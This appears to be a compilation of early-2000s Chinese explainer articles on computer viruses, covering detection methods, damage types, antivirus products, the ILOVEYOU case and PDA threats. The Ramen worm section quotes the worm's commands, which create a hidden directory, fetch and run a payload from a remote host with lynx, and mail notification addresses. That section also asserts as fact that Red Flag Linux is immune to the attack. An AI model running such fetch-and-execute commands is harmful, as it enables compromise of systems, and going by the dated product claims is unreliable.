A.速度慢。隨著病毒種類的增多,檢索時間變長。若果檢索5000種病毒,必須對5000個病毒特徵代碼逐一檢查。若果病毒種數再增加,檢病毒的時間開銷就變得十分可觀。此類工具檢驗的高速性,將變得日益困難。
B.誤報警率低。
非C.不能檢查多形性病毒。特徵代碼法是不可能檢驗多態性病毒的。國外專家認為多態性病毒是病毒特徵代碼法的索命者。
D.不能對付隱蔽性病毒。隱蔽性病毒若果先進駐記憶體,後執行病毒檢驗工具,隱蔽性病毒能先於檢驗工具,將被查檔案中的病毒代碼剝去,檢驗工具的確是在檢查一個虛假的"好檔案",而不能報警,被隱蔽性病毒所矇騙。

校驗和法
將標準檔案的內容,計算其校驗和,將該校驗和寫入檔案中或寫入別的檔案中儲存。在檔案使用過程中,定期地或每次使用檔案前,檢查檔案現在內容算出的校驗和與原來儲存的校驗和是否一致,因而可以發現檔案是否感染,這種方法叫校驗和法,它既可發現已知病毒又可發現不詳病毒。在SCAN和CPAV工具的後期版本中除了病毒特徵代碼法之外,還納入校驗和法,以提高其檢驗能力。
這種方法既能發現已知病毒,也能發現不詳病毒,但是,它不能識別病毒類,不能報出病毒名稱。由於病毒感染並非檔案內容改變的唯一的非他性原因,檔案內容的改變有可能是標準程式引起的,所以校驗和法常常誤報警。而且此種方法也會影響檔案的執行速度。
病毒感染的確會引起檔案內容變化,但是校驗和法對檔案內容的變化太敏感,又不能區分標準程式引起的變動,而頻繁報警。用監視檔案的校驗和來檢驗病毒,不是最好的方法。
這種方法遇到下述情況:已有軟體版更新、變更密碼、修改執行參數、校驗和法都會誤報警。
校驗和法對隱蔽性病毒無效。隱蔽性病毒進駐記憶體後,會自動剝去染毒程式中的病毒代碼,使校驗和法受騙,對一個有毒檔案算出標準校驗和。

運用校驗和法查病毒採用三種模式:
1在檢驗病毒工具中納入校驗和法,對被查的對象檔案計算其標準狀態的校驗和,將校驗和值寫入被查檔案中或檢驗工具中,而後進行比較。
2在套用程式中,放入校驗和法自我檢查功能,將檔案標準狀態的校驗和寫入檔案本身中,每當套用程式啟動時,比較現行校驗和與原校驗和值。實現套用程式的自檢驗。
3將校驗和檢查程式常駐記憶體,每當套用程式開始執行時,自動比較檢查套用程式內定或別的檔案中預先儲存的校驗和。

校驗和法的優點是:方法簡單能發現不詳病毒、被查檔案的細微變化也能發現。其缺點是:發佈通行記錄標準態的校驗和、會誤報警、不能識別病毒名稱、不能對付隱蔽型病毒。

行為監測法
利用病毒的特有行為特徵性來監測病毒的方法,稱為行為監測法。通過對病毒多年的觀察、研究,有一些行為是病毒的共同行為,而且比較特殊。在標準程式中,這些行為比較罕見。當程式執行時,監視其行為,若果發現了病毒行為,立即報警。

這些做為監測病毒的行為特徵如下:
A.佔有INT 13H
所有的引導型病毒,都攻擊Boot扇區或主引導扇區。系統啟動時,當Boot扇區或主引導扇區獲得執行權時,系統剛剛開工。一般引導型病毒都會佔用INT 13H功能,因為其他系統功能未設定好,無法利用。引導型病毒佔據INT 13H功能,在其中放置病毒所需的代碼。
B.改DOS系統為資料區的記憶體總量
病毒常駐記憶體後,為了防止DOS系統將其覆蓋,必須修改系統記憶體總量。
C.對COM、EXE檔案做寫入動作
病毒要感染,必須寫COM、EXE檔案。
D.病毒程式與宿主程式的切換
染毒程式執行中,先執行病毒,而後執行宿主程式。在兩者切換時,有許多特徵行為。

行為監測法的長處:可發現不詳病毒、可相當準確地預報不明的多數病毒。行為監測法的短處:可能誤報警、不能識別病毒名稱、實現時有一定難度。

軟體類比法
多態性病毒每次感染都變化其病毒密碼,對付這種病毒,特徵代碼法失效。因為多態性病毒代碼實施密碼化,而且每次所用密鑰不同,把染毒的病毒代碼相互比較,也無法找出相同的可能做為特徵的穩定代碼。雖然行為檢驗法可以檢驗多態性病毒,但是在檢驗出病毒後,因為不知病毒的種類,難於做消毒處理。

電腦病毒小知識速查系列六

電腦病毒的破壞行為

電腦病毒的破壞行為體現了病毒的殺傷能力。病毒破壞行為的激烈程度取決於病毒作者的主觀願望和他所具有的技術能量。數以萬計、不斷發展擴張的病毒,其破壞行為千奇百怪,不可能窮舉其破壞行為,難以做全面的描述。根據有的病毒資料可以把病毒的破壞目的和攻擊部位歸納如下:

1.攻擊系統資料區,攻擊部位內含:
硬碟主引尋扇區、Boot扇區、FAT表、檔案目錄。一般來說,攻擊系統資料區的病毒是惡性病毒,受損的資料不易恢復。

2.攻擊檔案
病毒對檔案的攻擊模式很多,可列舉如下:移除、改名、置換內容、丟失部分程式代碼、內容顛倒、寫入時間空白、變碎片、假冒檔案、丟失檔案簇、丟失資料檔。

3.攻擊記憶體
記憶體是電腦的重要資源,也是病毒的攻擊目的。病毒額外地佔用和消耗系統的記憶體資源,可以導致一些大程式受阻。病毒攻擊記憶體的模式如下:佔用大量記憶體、改變記憶體總量、禁止分配記憶體、蠶食記憶體。

4.干擾系統執行
病毒會干擾系統的標準執行,以此做為自己的破壞行為。此類行為也是花樣繁多,可以列舉下述諸模式:不執行指令、干擾內定指令的執行、虛假報警、打不開檔案、內定棧溢出、佔用特殊資料區、換現行盤、時鐘倒轉、重啟動、死機、強制遊戲、擾亂串並行口。

5.速度下降
病毒啟用時,其內定的時間延遲程式啟動。在時鐘中納入了時間的循環計數,迫使電腦空轉,電腦速度明顯下降。

6.攻擊磁碟
攻擊磁碟資料、不寫盤、寫動作變讀動作、寫盤時丟位元組。

7.擾亂螢幕顯示
病毒擾亂螢幕顯示的模式很多,可列舉如下:字元跌落、環繞、倒置、顯示前一屏、游標下跌、滾屏、抖動、亂寫、吃字元。

8.鍵盤
病毒干擾鍵盤動作,已發現有下述模式:響鈴、封鎖鍵盤、換字、抹掉快取區字元、重複、輸入紊亂。

9.喇叭
許多病毒執行時,會使電腦的喇叭發出響聲。有的病毒作者讓病毒演奏旋律優美的世界名曲,在高雅的曲調中去殺戮人們的訊息財富。有的病毒作者通過喇叭發出種種音效。已發現的有以下模式:演奏曲子、警笛聲、炸彈噪聲、鳴叫、卡卡聲、嘀嗒聲

10.攻擊CMOS
在機器的CMOS區中,儲存著系統的重要資料。例如系統時鐘、磁碟類型、記憶體容量等,並具有校驗和。有的病毒啟用時,能夠對CMOS區進行寫入動作,破壞系統CMOS中的資料。

11.干擾印表機
假報警、間斷性列印、更換字元。


電腦病毒小知識速查系列七

電腦病毒的防治策略
電腦病毒的防治要從防毒、查毒、解毒三方面來進行;系統對於電腦病毒的實際防治能力和效果也要從防毒能力、查毒能力和解毒能力三方面來評判。

"防毒"是指根據系統特性,採取相應的系統安全措施預防病毒侵入電腦。"查毒"是指對於確定的環境,能夠準確地報出病毒名稱,該環境內含,記憶體、檔案、引導區(含主導區)、網路等。"解毒"是指根據不同類型病毒對感染對象的修改,並按照病毒的感染特性所進行的恢復。該恢復過程不能破壞未被病毒修改的內容。感染對像內含:記憶體、引導區(含主引導區)、可執行檔案、文件檔案、網路等。

防毒能力是指預防病毒侵入電腦系統的能力。通過採取防毒措施,應可以準確地、實時地監測預警經由光碟、軟碟、硬碟不同目錄之間、局域網、因特網(內含FTP模式、E-MAIL、HTTP模式)或其它形式的檔案下載等多種模式進行的傳輸;能夠在病毒侵入系統是發出警報,記錄攜帶病毒的檔案,即時清除其中的病毒;對網路而言,能夠向網路管理員傳送關於病毒入侵的訊息,記錄病毒入侵的工作站,必要時還要能夠註銷工作站,隔離病毒源。

查毒能力是指發現和追蹤病毒來源的能力。通過查毒應該能準確地發現電腦系統是否感染有病毒,並準確尋找出病毒的來源,並能給出統計報告;查解病毒的能力應由查毒率和誤報率來評判。
解毒能力是指從感染對像中清除病毒,恢復被病毒感染前的原始訊息的能力;解毒能力套用解毒率來評判。


電腦病毒小知識速查系列八

Ramen是Linux的「病」而非「毒」
  
前一段時間,一些媒體報告:「世界上第一個Linux病毒Reman已經出現」。這引起我極大的興趣,並想一睹Reman的廬山真面目。但是,當我得到該病毒的有關資料和樣本之後發現:Reman並不能嚴格地稱為病毒,它實際上只是一個古老的、在Unix/Linux世界早已存在的「緩沖區溢出」攻擊程式。幾乎所有Unix/Linux版本中都或多或少地存在這樣的問題。第一次此種類型的攻擊(Morris Worm)是在十多年前,Reman這種「緩沖區溢出」攻擊程式並不是在今天的世界第一次出現。事實上,針對Windows98/NT的緩沖區溢出攻擊也是很常見的,且並不被稱為病毒。

  緩沖區溢出的原理是:向一個有限空間的緩沖區複制了過長的字串,覆蓋相鄰的存儲單元,從而引起程式執行失敗。因為自動變量儲存在堆棧當中,當發生緩沖區溢出的時候,存儲在堆棧中的函數返回位址也會被覆蓋,從而無法從發生溢出的函數標準返回(返回位址往往是一個無效的位址)。在這樣的情況下,系統一般報告:「core dump」或 「segment fault」。嚴重的情況是:若果覆蓋緩沖區的是一段精心設計的機器指令序列,它可能通過溢出,改變返回位址,將其指向自己的指令序列,從而改變該程式的標準流程。這段精心設計的指令一般的目的是:「/bin/sh」,所以這段代碼被稱為「shell code」。通過這樣的溢出可以得到一個shell,僅此而已。但是,若果被溢出是一個suid root程式,得到的將是一個root shell。這樣,機器的控制權已經易手,此後發生的任何事情都是合理的。

  下面我們回到Reman。它首先對網路上的主電腦進行掃瞄,通過兩個普通的漏洞進入系統,取得root權限,然後從源主電腦複製自身,以繼續掃瞄網上其他伺服器。對於Red Hat 6.2 來講,若果攻擊成功,它會做以下工作:

  mkdir /usr/src/.poop;cd /usr/src/.poop

  export TERM=vt100

  lynx -source http://FROMADDR:27374 > /usr/src/.poop/ramen.tgz

  cp ramen。tgz /tmp

  gzip -d ramen.tgz;tar -xvf ramen。tar;./start.sh

  echo Eat Your Ramen! | mail -s TOADDR -c gb31337@hotmail.com gb31337@yahoo.com

  很明顯,Reman只是一個自動化了的緩沖區溢出程式,而且是很普通的一種。目前緩沖區溢出攻擊是非常普遍的一種攻擊。黑客網站對各類系統的漏洞的發佈幾乎每日更新。這種攻擊模式並不是不可避免,目前已有很多對付該類攻擊的專案。需要指出的是:Reman這樣的攻擊程式對紅旗Linux的攻擊是不可能成功的,因為紅旗Linux全線產品都考慮了「緩沖區溢出」這樣的安全問題。


電腦病毒小知識速查系列九

專家談電腦病毒高發季節的防護
  4月是電腦病毒的高發季節。通過網路新途徑,病毒早已突破了地域界限,飛速傳播,預計本月有至少20餘種電腦病毒將向我們的電腦發起猛攻,其中尤以4月26日的CIH病毒最為險惡。

  八大「前兆」

  「電腦『發病』也有預兆,及早注意完全可以避免。」上海市訊息辦訊息安全專家石堅提醒市民注意以下八大「前兆」:電腦經常性出現無緣無故的死機;電腦系統無法標準啟動或啟動變慢;鍵盤、顯示有異常現象;執行速度明顯變慢;以前能標準執行的軟體經常發生記憶體不足的錯誤;檔案的長度、內容、屬性和日期等無故改變;經常丟失檔案、丟失資料;自動連結到一些陌生網站。「當出現上述情況時,說明您的電腦很可能已經感染了病毒。」「臨床」病徵石堅還列出了病毒發作時的病症:如「胡言亂語」——提示一些不相干的話,發出一段音樂,產生特定的圖像,硬碟燈不斷閃爍;「胡攪蠻纏」——突然進行遊戲算法,滑鼠自己在動,Windows桌面圖示亂動,系統自動傳送電子信件。「病情」嚴重時電腦還會突然死機或重新啟動。

  預防「接種」

  市電腦病毒防範服務中心82000熱線的專家專為電腦使用者開出了春季預防「藥方」,共計8味「良藥」:個人電腦乃至整個網路都應安裝實時防病毒軟體,以建立完整的網路防毒架構;及時更新掃毒軟體;不要開啟任何附件後綴為VBS、CHM、PIF、SCR、SHS的檔案,對附件後綴為EXE與COM的檔案應先確認再開啟;來歷不明的信件最好移除或先用防病毒軟體檢查;不要隱藏系統中已知檔案類型的副檔名;所有主旨有「FW:」的信件都要提高警惕;重要資料應作好備份;使用者應使用最新版的OutlookExpress安全修補程式或將瀏覽器設成最高安全性。專家還歡迎市民帶著問題參加本週六在上海圖書館知識廣場舉行的大型咨詢活動。


電腦病毒小知識速查系列十

及時升級反病毒軟體的利器

目前有許多電腦病毒發作特點不是快速而猛烈的,而是緩慢而狡猾的,有時還具有使用加密外掛自動升級的能力,反病毒專家認為這些發作緩慢的病毒有非同尋常的駐留本領,一旦發作將對電腦更加危險。正是由於病毒的日益增多,因此反病毒軟體也得到了大家的歡迎。但現在的病毒能夠自動地不斷升級,這就要求我們必須及時地對反病毒軟體進行升級發展,只有這樣才能使電腦更加安全地使用。但對反病毒軟體進行升級也不是一件很容易的事情,除了要確保它的時效性外,我們還必須考慮到完成該工作所要的時間,以及由此帶來的潛在的危險等因素,因為一點點的時間誤差就可能給自己的電腦造成難以彌補的損失。那麼我們該如何才能及時準確地升級反病毒軟體呢?下面筆者就以McAfee系列的反病毒軟體為例,和大家談談使用McAfee的ePo策略來在工作中及時完成對反病毒軟體的升級工作。

McAfee ePo是英文McAfee ePolicy Orchestrator的縮寫,它是一個與McAfee反病毒軟體結合比較緊密的綜合型管理工具,該工具一般具有智慧群組織使用者、策略的實時變化、增強的報告、安全的策略管理以及無縫升級反病毒軟體等特徵,它可以幫助我們及時完成反病毒軟體的分配工作,該項功能可以使我們這些普通的網民省卻了購買或尋找第三方軟體的麻煩,同樣也會降低工作中可能存在的安裝和升級的複雜性,更重要的一點就是ePo還可以與市面上流行的第三方軟體分配工具進行高效協調地工作,另外ePo還能夠監控並且改變使用者機器的組態,獲得狀態和事件的增強報告,追蹤病毒感染率和糾正行動。

對於我們遠端使用者來說,由於ePo是通過安全的http協定進行通信的,這樣我們就可以通過因特網或是近端的局域網來遠端管理自己的電腦系統,管理時,我們首先與ePo伺服器建立連線,一旦與伺服器連線成功後,ePo代理會自動連線到伺服器並把自上一次通信以來所收集到的所有存儲在近端的訊息傳輸到伺服器上。另外ePo設計合理的體系結構使得一台ePo伺服器能夠管理另外的一台和多台ePo伺服器,這為ePo生成分群組分級的報告打下了良好的基礎,同時ePo還具備26個預設報告和無限的定置報告能力,這使得生成的資料報告具有很強的資料加工能力,比起其他軟體的記流水帳的做法要強多了。若果病毒發作,ePo能將所有的McAfee反病毒軟體設定為全企業的自動更新,啟動一個手動掃瞄,並生成詳細報告來查明侵入地點以及確認傳播的模式和速度;當然ePo最受使用者歡迎的是它支援線上自動更新,利用該功能我們可以花最少的錢和時間來取得及時地升級反病毒軟體。

電腦病毒小知識速查系列十一

合理搭配使用殺病毒軟體

面對如今層出不窮的各類掃毒軟體,恐怕不單是「菜鳥」們找不著北,連一些「老鳥」也頗感頭痛。由於個人機器的效能、用途、習慣、興趣甚至心態的不同,形成了自己的套用軟體搭配風格,但幾乎很少有朋友注意到這其中的技巧。

一、使用掃毒軟體的幾個誤區

  很多朋友認為自己的機器裡頭裝了掃毒軟體就萬事大吉。其實到目前為止,世界上沒有一家掃毒軟體生產商敢承諾可以查殺所有已知病毒,這就意味著即便你裝了掃毒軟體,絕非從此就高枕無憂。我所見到的裝備了掃毒軟體的機器仍然被病毒侵蝕的案例不下10起。所以,在大家防範於未然的同時,合理搭配使用掃毒軟體也是必不可少的。 為數不少的朋友總是喜歡下載一大堆最新的卻是連自己也不知道如何用的共享掃毒軟體,甚至裝了又刪--直接後果是造成系統和其中某些程式產生衝突,有使系統崩潰的危險;註冊表也因此會凌亂、臃腫;系統檔案有可能被誤刪等,威脅著整個系統的安全。

  許多人只注意在Windows系統下按要求安裝掃毒軟體,卻忽略了DOS掃毒盤的重要性。病毒一旦感染了Windows系統套用程式,必須要在DOS下才能殺除。所以,朋友們一定要注意DOS應急盤的保護和更新。
??

二、如何合理搭配使用掃毒軟體

  大家都知道同時開啟兩套掃毒軟體的實時監控有可能會引起衝突,但是在機器上安裝多套掃毒軟體的同時只開啟一套掃毒軟體的實時監控程式卻是行得通的。這樣一來,不但可以揚長避短髮揮各自軟體的優勢,而且還可以交叉查殺病毒,極大的增強了機器的安全係數。若果您有條件,極力推薦!

  合理搭配前對各種掃毒軟體的特性要有必要的瞭解。目前的商業掃毒軟體分為國產和歐美兩大陣營。客觀的講,目前國產掃毒軟體的無論是整體功能設計、查掃毒數量等等還是與國際先進水平有一定差距,但國產品牌在價格、服務等方面還是有優勢的。這也是國產掃毒軟體能佔據80%國內市場份額的重要原因。

  在國產品牌中,瑞星對新近出現的流行病毒的查殺效果很明顯,但由於其是基於235K的病毒庫,所以查掃毒數量始終是瑞星的瓶頸;KV3000對比起KV300有了質的飛躍,對各種病毒具有廣泛查殺性,但是其更新速度稍慢,對新病毒的反應也不夠快。這正好和瑞星有了互補的可能;金山毒霸和KILL也是各有優勢。

  國際品牌裡首推McAfee。作為全球擁有7000萬使用者、號稱世界第一品牌的掃毒軟體,McAfee的確是做得不錯:界面設計精緻、合理,程式執行穩定,查掃毒數量在57000種以上。還有一點很重要:McAfee算是國際品牌裡頭最體貼中國使用者的掃毒軟體----儘管效能十分出色,但是其對資源的佔用率還是在大多數中國使用者的承受範圍以內。PC-cillin也是一款很大氣的掃毒軟體,基本效能與McAfee比較類似,但在查掃毒的數量上較為落後。熊貓衛士和諾頓最大的相似之處是它們的實時監控程式佔用了巨大的資源,若果您的機器是99年以前組態的話,基本上可以打消去試試這兩款軟體的念頭了。當然,作為享有良好聲譽的世界品牌,諾頓的綜合實力也是出類拔萃的。熊貓衛士是一款非常好用的軟體,哪怕您是頭一次坐在電腦面前,您也不會對它有手足無措的感覺。

三、掃毒軟體實用搭配專案

  1.McAfee5.13+瑞星。利用McAfee極強的綜合實力,發揮其在系統檢驗、對巨集病毒的偵測、E-mail監控、實時監控惡意JAVA和ActiveX控件等方面的優勢,加上McAfee本身具有的強大的查掃毒能力,輔之以對國內新流行病毒較為敏感、在DOS下非常易用(全中文界面、支援滑鼠)且查掃毒效能很好的瑞星,這樣一對群組合應該說是非常理想的。經測試,在隨系統只啟動McAfee實時監控的前提下,建立在Windows98上的這一對群組合沒有任何衝突。

  2.McAfee5.13+KILL。作為曾是國內掃毒權威認證形象的KILL,其在技術層面上不輸於國內任何一家對手,況且CA的技術實力我們應當可以充分信賴。KILL在國內建立的病毒監視小群組和CA遍佈全球的40多家類似機構應該可以給您充足的安全感。事實上,在隨系統開啟McAfee實時監控的情況下,病毒入侵這一群組合的可能性已經非常小了。經測試,無論是開啟KILL還是McAfee的實時監控,都不會與系統發生衝突。

  3.PC-cillin2001+KV3000。這又是一對黃金群組合。PC-cillin2001公認的最大優勢是其對以網路為載體的病毒和惡意JAVA和ActiveX程式的查殺;而KV3000擁有很好的DOS效能,一旦中招,還可利用KV3000轉移陣線,在DOS下再與病毒決一雌雄;還有KVW3000龐大的病毒樣板庫、優越的實時監控效能也會讓您安全感倍增。建議使用KVW3000的實時監控程式。這對群組合經由長達4個月的測試,沒有找到與系統或其他軟體衝突。


電腦病毒小知識速查系列十二

「我愛你」病毒創造者自白

  菲律賓輟學生古茲曼(Guzman)因創造了歷史上破壞力最強的電腦病毒「我愛你(Love Bug)」而名揚世界。

  他說,「我承認我創造病毒,但我不知道『我愛你』病毒是不是我創造的病毒之一。」「若果能知道源代碼(source code),我可以查檢視,也許是別人栽贓陷害,或是從我這裡偷走的。」

  24歲的古茲曼明白,在訊息時代,名氣轉瞬即逝。菲律賓一所電腦學校的這名輟學生,想在「我愛你」病毒的惡名還沒有被世人遺忘前,讓全世界都知道他是一名技術高超的黑客,一名能癱瘓個人電腦的「指揮官」。不過,古茲曼要小心法律制裁。雖然到目前為止「我愛你」是不是他所創造的仍難以下結論,但事實上,從美國國防部到英國國會,幾乎所有機構都沒有逃脫「我愛你」的毒手,這個病毒癱瘓全球電腦所造成的損失約達100億美元。在許多國家,古茲曼即使坐一輩子牢也難以洗清其罪名。

  菲律賓當局以盜竊及其它罪名起訴古茲曼,但在去年8月份因證據不足而還原。古茲曼沒有受到法律制裁的另一個原因是「我愛你」病毒在去年5月爆發時,菲律賓還沒有制裁電腦黑客行為的關聯法規。

  不過,菲律賓總統艾斯特拉達已在去年8月14日簽署了電子商務法,古茲曼也陷入了兩難境地:一方面他想承認是自己創造了「我愛你」病毒,這樣他可以利用這項「榮耀」賺錢,另一方面在接受記者採訪時,緊守不承認創造「我愛你」病毒的原則,因為他擔心會再次吃上官司。

  在辯護律師的陪同下,古茲曼說,全世界電腦天才多的是,「但我認為我已是菲律賓歷史的一部分,不能被抹煞。」

  古茲曼說他已不再非法入侵別人的電腦,但他仍在練習「破譯」密碼。他說,他使用這種技術從因特網下載軟體而不必付費。

  古茲曼並不認為用這種模式偷竊軟體是「偷」,就像他對電腦病毒所造成的損害從未在良心上受到譴責一樣。他說,軟體公司,特別是微軟,要為「我愛你」所產生的災難負責,因為他們在知情的情況下銷售易遭攻擊的產品。

  古茲曼說,「我是消費者,我購買這種產品,只是我的使用模式有問題或不恰當,但這都是我自己的事,為什麼要指責我?」

  業內人士指出,這種與道德無關的論調是電腦黑客的典型反應,不管他們是住在鱗次櫛比的馬尼拉住宅區,還是矽谷進階住宅區。

  事實上,僅僅在2000年春天以前,古茲曼還是個泛泛之輩,為獲得技術學院的電腦學位而苦苦掙扎。5月4日,一封名為「我愛你」的電子信件突然出現在亞洲的電腦上,只要一開啟,就會銷毀圖形及其它文件。這個電子信件程式會通過電腦中的資料庫自我複製,迅速傳輸給通訊錄中所有的聯絡人。不過數小時,歐美地區從新聞工作者、經紀商到政府機關無一倖免。

  古茲曼回憶說,當時他在家睡覺,當他醒來聽到這一新聞時,一點都沒有覺得與自己有關。

  馬尼拉一下子成了全球追捕病毒作者的重點地區。經由一番追查後,警方證實古茲曼是頭號嫌疑犯。一開始,古茲曼說他可能在無意間釋放出了病毒;但現在,他說他不知道病毒是怎麼跑出去的。

  在被當成嫌疑犯後,古茲曼有好幾個禮拜躲在他母親家。幾次冒險跑出來,發現大家對他指指點點後,便開始整天窩在家裡的沙發上,玩索尼推出的Play station。

  因為發生了這一事件,古茲曼在求職時,一度令電腦公司聞之色變。現在風頭已過,古茲曼終於找到了一份工作。他說,微軟的Outlook軟體是傳播病毒的主要工具之一,若果微軟提供不錯的條件,他願為微軟工作。


電腦病毒小知識速查系列十三

短消息接收也會傳播手機病毒

  橫行互聯網的電腦病毒下一個入侵目的是手機和移動上網裝置(PDA),最終侵入上網電視和其他上網家電。這是亞洲反病毒大會(AVAR)昨天透露的訊息。昨天是AVAR的最後一天,會議重點討論了電腦病毒的未來發展趨勢和應對策略。與會者普遍關注手機病毒的發展進度和解決專案,目前,已出現通過短訊息發佈來傳播病毒的手機概念病毒。所謂概念病毒是指已經實現潛伏、傳播、感染和破壞等病毒特性的病毒雛形。一旦使用者接收到帶有病毒的短訊息,閱讀後便會出現手機鍵盤被鎖死的現象,以後可能出現破壞手機記憶體儲的訊息,直至徹底破壞手機IC卡等惡性手機病毒。  

  應對手機病毒目前主要的技術措施有兩種:其一是通過無線網站對手機進行掃毒;其二是通過手機的IC接入口或紅外傳輸口進行掃毒。另據瞭解,應AVAR協會的邀請,中國專業反病毒公司北京瑞星公司正式成為AVAR協會會員,這是我國擁有完全自有知識產權的反病毒公司第一次加入國際性的反病毒群組織。


電腦病毒小知識速查系列十四

專家警示新病毒無WAP不摧

  澳大利亞一家互聯網安全機構日前警示說,病毒高手很有可能正在編寫一種妨礙新一代手機標準工作的病毒,這種病毒將以WAP技術為破壞目的,使手機使用者在接受上網服務時產生麻煩。

  這一由澳大利亞電腦緊急反應小群組發出的警示源自一份在澳大利亞國內流行的惡作劇電子信件,這份電子信件謊稱目前一種手機病毒正在傳播,它可以妨礙使用者接入網路,而且可以通過貯存在手機內的電話薄傳播給他人的手機。

  對此位於澳大利亞昆士蘭大學的小群組發言人馬克-麥克帕森指出:「儘管沒有跡象表明大規模的手機病毒將要爆發,但我們認為黑客在新興的無線手機領域編寫新的病毒一點也不令人奇怪。」

  據悉目前針對掌上電腦的病毒已於今年早些時間被發現,這種病毒在使用者利用掌上電腦玩任天堂遊戲時被啟動,它能夠破壞掌上電腦所存貯的資料。9月份,一種名為Phage的掌上電腦病毒也悄然露面,它具有更大的破壞性,可在程式之間傳播也可通過使用者共享軟體中傳播給其它的掌上電腦。


電腦病毒小知識速查系列十五

您的PDA需要反病毒軟體保護嗎?

說起電腦病毒和反病毒之間的鬥爭,很多朋友都會認為那只有台式電腦和便攜式筆記本電腦才會感染電腦病毒。確實如此,傳統的電腦病毒主要寄生和感染台式PC機,或是通過INTERNET來傳播。很少人聽說PDA(個人數字助理)這樣的手持式的無線通信數字產品也會受到電腦病毒的威脅。
但目前隨著PDA和WAP的飛速發展,電腦專家正在進行PDA是否正在受到病毒威脅和是否需要特別的反病毒軟體來保護的問題。專家認為,PDA由於經常需要和台式PC機進行資料同步交換,而PC機上的Word 或 Excel 文件很容易感染巨集病毒。若果是在大公司的局域網裡,這種現象更為嚴重。局域網中只要有一台電腦感染電腦病毒,那麼整個網路都將十分的危險。PDA使用的動作系統比如WINDWOS CE是和普通台式PC機基本上有著同樣的資料處理能力。而專門為PDA設計的套用軟體中亦有能處理EXCEL或WORD文件的功能。這意味著PDA只要和感染病毒的台式PC機進行資料同步,那麼PDA很可能就和PC機一樣受到病毒的感染,甚至病毒會在PDA中發作。所以有專家形象的把感染病毒的PDA比喻成「一張塞在PC機軟驅裡的感染病毒的軟磁碟」。「一個在公司局域網裡流動的炸彈」。由此可見,PDA正在受到病毒的威脅,保護PDA的資料安全已經是一個十分重要的問題。
幸運的是,國際著名的反病毒軟體公司Network Associates已經於8月21日宣佈推出基於保護PDA的新型防病毒軟體。這種新型的防病毒軟體被成為McAfee VirusScan Handheld。根據Network Associates的資料表明,McAfee VirusScan Handheld主要是用於個人數字助理PDA和其他手持式電腦的安全防護,McAfee VirusScan Handheld是為了幫助大公司處理和保護日益增長的數字移動使用者的數字產品的資料安全而設計的。
McAfee VirusScan Handheld是一個套用軟體,它能安裝在使用者的台式PC機和與其交換資料的PDA上。McAfee VirusScan Handheld的反病毒原理基本上和傳統的McAfee VirusScan 一樣,通過掃瞄,監視台式PC機和PDA的資料同步來判斷電腦是否感染病毒。也可以作為台式PC機向PDA傳輸資料的病毒過濾器。McAfee VirusScan Handheld能對付各種已知的規則的檔案類型,一般電腦病毒經常感染寄生的檔案都能被McAfee VirusScan Handheld檢驗。


電腦病毒小知識速查系列十六

新病毒時代

  與新經濟學家相比,病毒更有理由成為網路時代的寵兒,這是因為:第一,病毒具有更強的表現欲和活動能力;第二,事實證明,病毒能更好地實踐互聯網速度,從而更加有效地利用整個互聯網。

  使用者:都是網路惹的禍

  令人膽戰心驚的病毒警報最近再度響起,對象是那些借網路之風日漸流行的掌上電腦。與前一陣沸沸揚揚的手機病毒不同,這一次不再是紙上談兵,據稱,不少使用者已經遭遇到了這種被稱為Palm.Liberty.A的病毒,趨勢科技等公司先後在網上公佈了程式代碼,讓使用者及時下載,以查殺這一全新病毒。Palm.Liberty.A病毒的出現,標誌著我們邁入一個全新的病毒時代。

  一切光榮歸於互聯網,一切危害也來自於它。網路對於病毒是如此的鍾愛,讓我們先來看看下面這一群組數字:1999年上半年,通過Internet傳播的四種病毒(happy99、CIH、Melissa、ZIP-explorer)造成了76億美元的巨額損失。這一數字是此前4年所有病毒造成損失的總額。然而這並不算什麼,病毒總是喜歡挑戰自我,一句「ILOVEYOU」橫掃互聯網,在短短的數天之內,愛蟲自己就創下了65億美元損失的空前紀錄。

  病毒是寄生於速度的物種,只有速度才能賦予它巨大的能量,因此,網路理所當然地成為了病毒的最佳伴侶。在CIH病毒之前,筆者很少為媒體上炒得熱熱鬧鬧的病毒發愁,因為那時主要的傳播介質就是軟碟,即使是流行病毒,從國外傳進國內一般也需要幾個月的時間。而且,只要使用者記住在使用軟碟時,先進行病毒掃瞄,就可以在很大的程度上避免病毒的感染。

  現在,網路使病毒得到了前所未有的進化,生出翅膀的病毒迫不及待地向人們展示,什麼才是互聯網的速度。還記得那個「Melissa」嗎,這個「小姑娘」在病毒家族中率先完成了自己的「互聯網轉型」。1999年3月26日,Melissa從製作者的電腦出發,短短的17個小時之內,在300多家企業,至少10萬台電腦上留下了自己的足跡。不過,後來出現的愛蟲病毒很快使得這一成績黯然失色。

  在運動中破壞,在運動中繁殖。這就是病毒生存的哲理。1999年以前,全球病毒總數約18000種,而2000年還未過完,這一數字已經突破40000種。當時的愛蟲病毒,就曾經在一天之內,產生了數十個變種。在您閱讀本文的時候,可能又有一群病毒爬上了網路,開始了它們的速度之旅。

  當病毒愛上網路,我們又能做些什麼呢?

  反毒公司:你是風兒,我是沙.....

  「你是風兒,我是沙,纏纏綿綿到天涯......」。這句歌詞是病毒和反毒公司之間關係的最好詮釋。病毒恨反病毒公司嗎?是的。反病毒公司愛病毒嗎?答案同樣是肯定的。若果說網路與病毒是最親密的伴侶,那麼病毒與反病毒公司就是一對歡喜冤家。

  有了病毒,才有了反毒公司腰袋中鼓鼓的鈔票。借助病毒的「恐嚇」,反毒軟體McAfee的股票首日上市就上漲了三倍,從那些被病毒嚇得心驚肉跳的使用者手中,共「敲詐」到了20.4億美金。這次掌上電腦病毒的出現,更是使各大反毒廠商興奮不已,透過這只病毒,廠商們看到了一個遠未開發的巨大金礦,那就是掌上裝置與訊息家電的安全防護。各廠商爭先恐後地推出自己的解決專案,惟恐在這塊新興的市場上落後一步。

